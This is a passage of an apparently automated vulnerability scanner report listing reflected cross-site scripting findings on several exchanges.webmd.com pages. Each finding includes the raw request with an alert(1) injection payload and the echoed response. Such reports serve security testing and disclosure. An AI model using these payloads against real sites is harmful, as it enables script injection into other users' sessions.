1.12. http://exchanges.webmd.com/webmd-exchanges/blogs [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/blogs

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload babf0'-alert(1)-'d9622103594 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchanges/blogs?babf0'-alert(1)-'d9622103594=1 HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 98996
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp1
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:53:48 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
://as.webmd.com/html.ng/transactionID='+transID+'&tile='+tileID+'&site=2&affiliate=20&hcent=&scent=&exgid=[exgid]&app='+adApp+adAuid+'&pos=101&exg1=1680&sec=&au1=&au2=&uri=%2fwebmd-exchanges%2fblogs%3fbabf0'-alert(1)-'d9622103594%3d1&artid=091e9c5e80470c99&inst=0&amp;leaf=">
...[SNIP]...

1.13. http://exchanges.webmd.com/webmd-exchanges/blogs [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/blogs

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9a331"-alert(1)-"ec097290236 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchanges/blogs?9a331"-alert(1)-"ec097290236=1 HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 99013
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp2
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:53:46 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<script language="javascript" type="text/javascript"> var s_furl="/webmd-exchanges/blogs?9a331"-alert(1)-"ec097290236=1"; var s_sponsor_program=""; var s_sensitive="false"; var image_server_url="http://img.webmd.com/dtmcms/live"; var space_id=""; var space_title=""; var space_name=""; var space_type=""; var space_sit
...[SNIP]...

1.14. http://exchanges.webmd.com/webmd-exchanges/cancer-exchanges [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/cancer-exchanges

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload edca8'-alert(1)-'34d3c48ff25 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchangesedca8'-alert(1)-'34d3c48ff25/cancer-exchanges HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 59527
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp1
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:03 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
html.ng/transactionID='+transID+'&tile='+tileID+'&site=2&affiliate=20&hcent=&scent=&exgid=[exgid]&app='+adApp+adAuid+'&pos=101&exg1=4116&sec=&au1=&au2=&uri=%2f404%3faspxerrorpath%3d%252fwebmd-exchangesedca8'-alert(1)-'34d3c48ff25%252fcancer-exchanges&artid=091e9c5e804851a3&inst=0&amp;leaf=">
...[SNIP]...

1.15. http://exchanges.webmd.com/webmd-exchanges/cancer-exchanges [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/cancer-exchanges

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d0815'-alert(1)-'d1f50966244 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchanges/cancer-exchangesd0815'-alert(1)-'d1f50966244 HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 59527
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp3
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:12 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
='+transID+'&tile='+tileID+'&site=2&affiliate=20&hcent=&scent=&exgid=[exgid]&app='+adApp+adAuid+'&pos=101&exg1=4116&sec=&au1=&au2=&uri=%2f404%3faspxerrorpath%3d%252fwebmd-exchanges%252fcancer-exchangesd0815'-alert(1)-'d1f50966244&artid=091e9c5e804851a3&inst=0&amp;leaf=">
...[SNIP]...

1.16. http://exchanges.webmd.com/webmd-exchanges/cancer-exchanges [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/cancer-exchanges

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1cd64'-alert(1)-'13537b384aa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchanges/cancer-exchanges?1cd64'-alert(1)-'13537b384aa=1 HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 69751
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp1
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:53:52 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
.ng/transactionID='+transID+'&tile='+tileID+'&site=2&affiliate=20&hcent=&scent=&exgid=[exgid]&app='+adApp+adAuid+'&pos=101&exg1=3552&sec=8000|8001&au1=&au2=&uri=%2fwebmd-exchanges%2fcancer-exchanges%3f1cd64'-alert(1)-'13537b384aa%3d1&artid=091e9c5e805cc69f&inst=0&amp;leaf=">
...[SNIP]...

1.17. http://exchanges.webmd.com/webmd-exchanges/cancer-exchanges [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/cancer-exchanges

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 937f8"-alert(1)-"68857cebe14 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchanges/cancer-exchanges?937f8"-alert(1)-"68857cebe14=1 HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 69765
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp3
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:53:50 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<script language="javascript" type="text/javascript"> var s_furl="/webmd-exchanges/cancer-exchanges?937f8"-alert(1)-"68857cebe14=1"; var s_sponsor_program=""; var s_sensitive="false"; var image_server_url="http://img.webmd.com/dtmcms/live"; var space_id=""; var space_title=""; var space_name=""; var space_type=""; var space_sit
...[SNIP]...

1.18. http://exchanges.webmd.com/webmd-exchanges/digestive-disorders-exchanges [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/digestive-disorders-exchanges

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e6ad'-alert(1)-'88b4e879c5e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchanges9e6ad'-alert(1)-'88b4e879c5e/digestive-disorders-exchanges HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 59566
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp2
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:36 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
html.ng/transactionID='+transID+'&tile='+tileID+'&site=2&affiliate=20&hcent=&scent=&exgid=[exgid]&app='+adApp+adAuid+'&pos=101&exg1=4116&sec=&au1=&au2=&uri=%2f404%3faspxerrorpath%3d%252fwebmd-exchanges9e6ad'-alert(1)-'88b4e879c5e%252fdigestive-disorders-exchanges&artid=091e9c5e804851a3&inst=0&amp;leaf=">
...[SNIP]...

1.19. http://exchanges.webmd.com/webmd-exchanges/digestive-disorders-exchanges [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/digestive-disorders-exchanges

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b5e79'-alert(1)-'3756566e454 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchanges/digestive-disorders-exchangesb5e79'-alert(1)-'3756566e454 HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 59566
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp4
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:47 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
tile='+tileID+'&site=2&affiliate=20&hcent=&scent=&exgid=[exgid]&app='+adApp+adAuid+'&pos=101&exg1=4116&sec=&au1=&au2=&uri=%2f404%3faspxerrorpath%3d%252fwebmd-exchanges%252fdigestive-disorders-exchangesb5e79'-alert(1)-'3756566e454&artid=091e9c5e804851a3&inst=0&amp;leaf=">
...[SNIP]...

1.20. http://exchanges.webmd.com/webmd-exchanges/digestive-disorders-exchanges [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/digestive-disorders-exchanges

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 19bcd"-alert(1)-"af5789461db was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchanges/digestive-disorders-exchanges?19bcd"-alert(1)-"af5789461db=1 HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 67123
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp4
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:20 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<script language="javascript" type="text/javascript"> var s_furl="/webmd-exchanges/digestive-disorders-exchanges?19bcd"-alert(1)-"af5789461db=1"; var s_sponsor_program=""; var s_sensitive="false"; var image_server_url="http://img.webmd.com/dtmcms/live"; var space_id=""; var space_title=""; var space_name=""; var space_type=""; var space_sit
...[SNIP]...

1.21. http://exchanges.webmd.com/webmd-exchanges/digestive-disorders-exchanges [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/digestive-disorders-exchanges

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 559a7'-alert(1)-'0f02beb19c1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchanges/digestive-disorders-exchanges?559a7'-alert(1)-'0f02beb19c1=1 HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 67107
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp1
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:21 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
onID='+transID+'&tile='+tileID+'&site=2&affiliate=20&hcent=&scent=&exgid=[exgid]&app='+adApp+adAuid+'&pos=101&exg1=3552&sec=8000|8001&au1=&au2=&uri=%2fwebmd-exchanges%2fdigestive-disorders-exchanges%3f559a7'-alert(1)-'0f02beb19c1%3d1&artid=091e9c5e805cc6d1&inst=0&amp;leaf=">
...[SNIP]...

1.22. http://exchanges.webmd.com/webmd-exchanges/eating-diet-exchanges [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/eating-diet-exchanges

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a683'-alert(1)-'734a36af06 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchanges3a683'-alert(1)-'734a36af06/eating-diet-exchanges HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 59539
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp4
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:22 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
html.ng/transactionID='+transID+'&tile='+tileID+'&site=2&affiliate=20&hcent=&scent=&exgid=[exgid]&app='+adApp+adAuid+'&pos=101&exg1=4116&sec=&au1=&au2=&uri=%2f404%3faspxerrorpath%3d%252fwebmd-exchanges3a683'-alert(1)-'734a36af06%252feating-diet-exchanges&artid=091e9c5e804851a3&inst=0&amp;leaf=">
...[SNIP]...

1.23. http://exchanges.webmd.com/webmd-exchanges/eating-diet-exchanges [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/eating-diet-exchanges

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 21ab4'-alert(1)-'ae4a99fd1be was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchanges/eating-diet-exchanges21ab4'-alert(1)-'ae4a99fd1be HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 59542
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp4
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:33 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
ansID+'&tile='+tileID+'&site=2&affiliate=20&hcent=&scent=&exgid=[exgid]&app='+adApp+adAuid+'&pos=101&exg1=4116&sec=&au1=&au2=&uri=%2f404%3faspxerrorpath%3d%252fwebmd-exchanges%252feating-diet-exchanges21ab4'-alert(1)-'ae4a99fd1be&artid=091e9c5e804851a3&inst=0&amp;leaf=">
...[SNIP]...

1.24. http://exchanges.webmd.com/webmd-exchanges/eating-diet-exchanges [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/eating-diet-exchanges

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 24c77"-alert(1)-"04761d393fc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchanges/eating-diet-exchanges?24c77"-alert(1)-"04761d393fc=1 HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 70275
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp3
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:09 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<script language="javascript" type="text/javascript"> var s_furl="/webmd-exchanges/eating-diet-exchanges?24c77"-alert(1)-"04761d393fc=1"; var s_sponsor_program=""; var s_sensitive="false"; var image_server_url="http://img.webmd.com/dtmcms/live"; var space_id=""; var space_title=""; var space_name=""; var space_type=""; var space_sit
...[SNIP]...

1.25. http://exchanges.webmd.com/webmd-exchanges/eating-diet-exchanges [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/eating-diet-exchanges

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a3526'-alert(1)-'92250c2ea7d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchanges/eating-diet-exchanges?a3526'-alert(1)-'92250c2ea7d=1 HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 70259
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp2
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:10 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
ransactionID='+transID+'&tile='+tileID+'&site=2&affiliate=20&hcent=&scent=&exgid=[exgid]&app='+adApp+adAuid+'&pos=101&exg1=3552&sec=8000|8001&au1=&au2=&uri=%2fwebmd-exchanges%2feating-diet-exchanges%3fa3526'-alert(1)-'92250c2ea7d%3d1&artid=091e9c5e805cbe42&inst=0&amp;leaf=">
...[SNIP]...

1.26. http://exchanges.webmd.com/webmd-exchanges/health-experts [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/health-experts

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ade90'-alert(1)-'2e050d781bd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchangesade90'-alert(1)-'2e050d781bd/health-experts HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 59521
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp2
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:05 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
